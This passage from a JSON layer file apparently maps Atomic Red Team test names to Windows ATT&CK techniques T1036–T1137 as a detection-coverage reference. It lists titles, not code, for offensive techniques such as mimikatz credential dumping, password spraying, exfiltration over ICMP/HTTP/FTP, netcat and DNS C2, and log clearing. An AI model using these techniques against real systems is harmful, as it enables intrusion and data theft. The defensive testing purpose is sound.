Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administive share with copy\n- Copy a sensitive File over Administive share with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":4,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":1,"enabled":true,"comment":"\n- C2 Data Exfiltration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":6,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":9,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":1,"enabled":true,"comment":"\n- Process Injection via C#\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":2,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":4,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":32,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Obfuscation Tests\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- PowerShell Downgrade Attack\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":5,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":13,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":16,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":17,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":3,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":4,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":3,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":48,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":6,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":3,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a 